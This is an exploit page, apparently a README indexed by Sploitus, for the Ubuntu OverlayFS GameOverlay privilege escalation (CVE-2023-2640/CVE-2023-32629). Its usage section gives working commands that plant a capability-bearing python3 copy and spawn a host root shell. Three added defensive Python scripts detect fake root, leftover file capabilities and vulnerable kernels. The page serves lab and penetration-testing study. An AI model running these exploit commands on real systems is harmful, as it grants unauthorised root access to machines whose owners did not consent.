## https://sploitus.com/exploit?id=763E086B-B0C5-52EA-B5E2-3E3F15B422B0
# CVE-2023-2640 & CVE-2023-32629 (GameOverLay) - Real Host Root Escape PoC

An interactive, multi-step Local Privilege Escalation (LPE) Proof of Concept (PoC) targeting the Ubuntu Linux kernel OverlayFS vulnerabilities (**CVE-2023-2640** / **CVE-2023-32629**).

Unlike standard automated one-liners that trap your interactive shell inside a restrictive **User Namespace (Fake Root)**, this methodology splits the exploit sequence to safely drop a **true, unrestricted host root shell**.

---

## The "Fake Root" Problem Explained

Many public exploits string the setup and execution together using a single automated shell sequence like this:
`unshare -rm sh -c "mkdir l u w m && ... && touch m/*; python3 -c '...'"`

Because the Python execution payload is embedded inside the `unshare` double quotes, it executes **internally** within the user namespace sandbox.
* **The Result:** Your user ID reads as `uid=0(root)`, but that is root only inside the user namespace; the kernel still treats the shell as your original unprivileged uid on the host. If you try to view the host root directory (`cd /root`), you will hit a `Permission denied` error.
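The reason `id` lies here is the uid mapping: `unshare -r` maps uid 0 inside the new namespace onto the caller's real uid, and the kernel exposes that mapping in `/proc/<pid>/uid_map`, which nothing inside the namespace can rewrite. The following is an added example (not code from the PoC) that reads the mapping the way a defender or CTF player would to tell fake root from host root. The `SAMPLE_*` strings are constructed inputs; `in_initial_user_namespace` is a helper name chosen here, not a kernel or library API.

```python
"""Distinguish a user-namespace "root" from the host's root via uid_map."""
import os

# What the initial (host) user namespace shows in /proc/self/uid_map.
INIT_NS_UID_MAP = "         0          0 4294967295\n"

# Constructed sample: what `unshare -r` run by host uid 1000 produces.
SAMPLE_FAKE_ROOT_UID_MAP = "         0       1000          1\n"


def parse_uid_map(text):
    """Return the map as a list of (ns_start, host_start, count) triples."""
    rows = []
    for line in text.splitlines():
        if line.strip():
            ns_start, host_start, count = (int(x) for x in line.split())
            rows.append((ns_start, host_start, count))
    return rows


def ns_uid_to_host(ns_uid, rows):
    """Translate a namespace uid to the host uid; None if the uid is unmapped
    (unmapped ids show up as nobody/65534 inside the namespace)."""
    for ns_start, host_start, count in rows:
        if ns_start <= ns_uid < ns_start + count:
            return host_start + (ns_uid - ns_start)
    return None


def in_initial_user_namespace(uid_map_text):
    """The host namespace carries exactly the identity map over the full range.
    A privileged parent can reproduce this map in a child namespace, so treat
    the result as a strong indicator rather than absolute proof."""
    return parse_uid_map(uid_map_text) == [(0, 0, 4294967295)]


def describe(uid, uid_map_text):
    """Human-readable verdict for the given uid under the given map."""
    host_uid = ns_uid_to_host(uid, parse_uid_map(uid_map_text))
    if uid == 0 and in_initial_user_namespace(uid_map_text):
        return "uid 0 is the host's root"
    if uid == 0:
        return "uid 0 is a user-namespace mapping of host uid %s (fake root)" % host_uid
    return "uid %d maps to host uid %s" % (uid, host_uid)


if __name__ == "__main__":
    with open("/proc/self/uid_map") as f:
        print(describe(os.getuid(), f.read()))
```

Run inside `unshare -r` it prints the "fake root" line even though `id` says `uid=0(root)`; run from a shell with the host's real root it prints the first line.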

### The Fix

This PoC splits the process into two distinct logical stages:
1. **Weaponize inside the Sandbox:** Run `unshare` to fake root permissions *just* long enough to exploit the OverlayFS `ovl_copy_up` flaw, leaving a copy of `python3` that carries the `cap_setuid+eip` file capability in a local, user-writable directory.
2. **Execute outside the Sandbox:** The namespace ends as soon as the `unshare` command exits. The backdoored binary is then executed directly from the **real host context** as a normal unprivileged user. The kernel honours the leaked file capability, allows `os.setuid(0)`, and hands you a shell with the host's real root privileges.
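The durable artifact of stage 1 is a copy of an interpreter in a user-writable directory carrying a `security.capability` extended attribute that the host honours. The following added example (not part of the PoC) is the check a defender would run after patching: it decodes that xattr exactly as the kernel stores it (`struct vfs_cap_data` from `linux/capability.h`, revision 2 host-wide, revision 3 with a `rootid` that scopes the capability to one user namespace) and walks the usual scratch directories for files that carry root-equivalent bits. The `SAMPLE_*` byte strings are constructed to match what `setcap cap_setuid+eip` writes; `HIGH_RISK_CAPS`, `risk` and `scan` are names chosen here, not kernel or library APIs.

```python
"""Hunt for file capabilities left on binaries in user-writable directories."""
import os
import struct
import sys

# Kernel UAPI constants (linux/capability.h).
VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_REVISION_2 = 0x02000000      # 20-byte record, valid in the host namespace
VFS_CAP_REVISION_3 = 0x03000000      # 24-byte record, adds rootid (namespace-scoped)
VFS_CAP_FLAGS_EFFECTIVE = 0x00000001
CAP_SETUID = 7

# Capability bits that make a user-writable binary root-equivalent.
HIGH_RISK_CAPS = {
    0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search",
    3: "cap_fowner", 6: "cap_setgid", 7: "cap_setuid", 8: "cap_setpcap",
    16: "cap_sys_module", 17: "cap_sys_rawio", 19: "cap_sys_ptrace",
    21: "cap_sys_admin", 31: "cap_setfcap",
}

# Constructed samples: `setcap cap_setuid+eip` as a host-wide v2 record, and the
# same bits as a v3 record whose rootid is host uid 1000 (namespace-scoped).
SAMPLE_SETUID_V2 = bytes.fromhex("0100000280000000800000000000000000000000")
SAMPLE_SETUID_V3_UID1000 = bytes.fromhex("0100000380000000800000000000000000000000e8030000")


def decode_vfs_cap(blob):
    """Decode a raw security.capability value (little-endian vfs_cap_data)."""
    if len(blob) < 4:
        raise ValueError("security.capability value too short")
    (magic_etc,) = struct.unpack_from("<I", blob, 0)
    revision = magic_etc & VFS_CAP_REVISION_MASK
    if revision == VFS_CAP_REVISION_2 and len(blob) >= 20:
        p_lo, i_lo, p_hi, i_hi = struct.unpack_from("<4I", blob, 4)
        rootid = 0
    elif revision == VFS_CAP_REVISION_3 and len(blob) >= 24:
        p_lo, i_lo, p_hi, i_hi, rootid = struct.unpack_from("<5I", blob, 4)
    else:
        raise ValueError("unsupported vfs_cap_data revision 0x%08x" % revision)
    return {
        "revision": revision >> 24,
        "effective": bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE),
        "permitted": p_lo | (p_hi << 32),
        "inheritable": i_lo | (i_hi << 32),
        "rootid": rootid,   # 0 = valid in the initial user namespace, i.e. host-wide
    }


def high_risk_names(mask):
    """Names of the high-risk capability bits set in mask, lowest bit first."""
    return [name for bit, name in sorted(HIGH_RISK_CAPS.items()) if mask & (1 << bit)]


def risk(decoded):
    """Classify a decoded record for triage."""
    if not high_risk_names(decoded["permitted"]):
        return "low"
    if decoded["rootid"] != 0:
        return "namespace-scoped"   # honoured only where this uid maps to root
    return "critical" if decoded["effective"] else "high"


def scan(roots):
    """Walk roots and return (path, decoded_or_None) for every file with a capability."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    blob = os.getxattr(path, "security.capability", follow_symlinks=False)
                except OSError:
                    continue    # ENODATA for almost every file; races and EPERM too
                try:
                    hits.append((path, decode_vfs_cap(blob)))
                except ValueError:
                    hits.append((path, None))   # undecodable record: still worth a look
    return hits


if __name__ == "__main__":
    # Places an unprivileged user can write; override on the command line.
    roots = sys.argv[1:] or ["/tmp", "/var/tmp", "/dev/shm", "/home"]
    for path, decoded in scan(roots):
        if decoded is None:
            print("UNKNOWN          %s (undecodable security.capability)" % path)
        else:
            print("%-16s %s permitted=%s rootid=%d" % (
                risk(decoded).upper(), path,
                ",".join(high_risk_names(decoded["permitted"])) or "-", decoded["rootid"]))
```

A `CRITICAL` hit on a copy of `python3` under `/tmp` is exactly the residue stage 1 leaves behind; `getcap -r /tmp` shows the same information if the `libcap` tools are installed, but the decoder above also reports the `rootid` field, which `getcap` output does not make obvious.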

---

## Vulnerability Details

* **CVE-2023-2640**: Ubuntu Kernel OverlayFS incorrect restriction of file capabilities within user namespaces.
* **CVE-2023-32629**: Flaw in Ubuntu Kernel's `ovl_copy_up_meta_inode_data` function allowing validation checks to be entirely bypassed during file migration.
* **Affected Systems**: Ubuntu 22.04 LTS running Linux Kernel releases below `6.2.0-26-generic`.
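To turn the affected-systems line into a check, two things matter on a host: whether the running kernel is older than the fixed build, and whether an unprivileged user can create user namespaces at all, since the whole chain starts with `unshare -r`. The following is an added example (not part of the PoC) that compares `uname -r` style release strings against the `6.2.0-26-generic` threshold stated above and reads Ubuntu's `kernel.unprivileged_userns_clone` sysctl. It assumes the Ubuntu release-string layout `X.Y.Z-ABI-flavour`; because the page gives a threshold only for the 6.2 series, kernels from another series (for example Ubuntu 22.04's 5.15 GA kernel) are reported as not covered rather than guessed at. `kernel_below` and `assess` are names chosen here.

```python
"""Posture check against the affected-systems statement for GameOverlay."""
import platform
import re

PAGE_FIXED_RELEASE = "6.2.0-26-generic"   # threshold stated on this page

_RELEASE_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-(\d+))?")


def parse_release(release):
    """'6.2.0-26-generic' -> (6, 2, 0, 26); a missing Ubuntu ABI number counts as 0."""
    m = _RELEASE_RE.match(release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    major, minor, patch, abi = m.groups()
    return int(major), int(minor), int(patch), int(abi or 0)


def kernel_below(release, threshold=PAGE_FIXED_RELEASE):
    """True if release is an older build in the same major.minor series as
    threshold, False if it is the fixed build or newer, None if it belongs to
    a different series (the page states no threshold for those)."""
    r, t = parse_release(release), parse_release(threshold)
    if r[:2] != t[:2]:
        return None
    return r < t


def unprivileged_userns_allowed():
    """Ubuntu/Debian-specific sysctl; None when the knob is absent on this kernel."""
    try:
        with open("/proc/sys/kernel/unprivileged_userns_clone") as f:
            return f.read().strip() == "1"
    except OSError:
        return None


def assess(release, userns_allowed):
    """Return (status, message) where status is one of
    'unknown', 'patched', 'mitigated', 'vulnerable'."""
    below = kernel_below(release)
    if below is None:
        return ("unknown",
                "kernel %s is outside the 6.2 series this page covers; "
                "check the distro advisory for its fixed build" % release)
    if not below:
        return ("patched", "kernel %s is at or past %s" % (release, PAGE_FIXED_RELEASE))
    if userns_allowed is False:
        return ("mitigated",
                "kernel %s is below %s but unprivileged user namespaces are "
                "disabled, which stops the unshare -r step; still patch" % (release, PAGE_FIXED_RELEASE))
    return ("vulnerable",
            "kernel %s is below %s and unprivileged user namespaces are "
            "available: patch now" % (release, PAGE_FIXED_RELEASE))


if __name__ == "__main__":
    status, message = assess(platform.release(), unprivileged_userns_allowed())
    print("%s: %s" % (status.upper(), message))
```

Setting `kernel.unprivileged_userns_clone=0` is a stop-gap, not a fix: it only removes the entry point this PoC uses, and it breaks software that legitimately relies on unprivileged user namespaces (rootless containers, browser sandboxes), so the kernel update is still the real remediation.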

---

## Usage Instructions

### Method 1: The Automated Script (Recommended)

1. Clone or download `exploit.sh` to the target machine (e.g., inside `/tmp`).
2. Give it execution permissions and run it:

```bash
chmod +x exploit.sh
./exploit.sh
```

### Method 2: Manual Line-by-Line Interactive Execution

If you are working over an unstable reverse shell, run these commands completely separately, pressing `Enter` after each line:

```bash
# 1. Clean workspace environment
cd /tmp && rm -rf l u w m

# 2. Forge the backdoor within the temporary namespace sandbox
unshare -rm sh -c "mkdir l u w m && cp /usr/bin/python3 l/ && setcap cap_setuid+eip l/python3 && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*"

# 3. Trigger execution on the real host to claim true root
./u/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```

Verify that you hold real host privileges by checking your identity and reading a root-only file:
```bash
whoami
cat /root/root.txt
```

---

## Credits & Acknowledgments
The baseline exploit mechanics used in this interactive refactor were originally discovered and documented by security researchers **Liav Eliyahu** and **g1vi**.

## Disclaimer
This repository is created strictly for educational, security research, and authorized penetration testing purposes (such as HackTheBox / OffSec labs). The author assumes no liability for misuse, unauthorized access attempts, or infrastructure damage caused by this material. Use responsibly.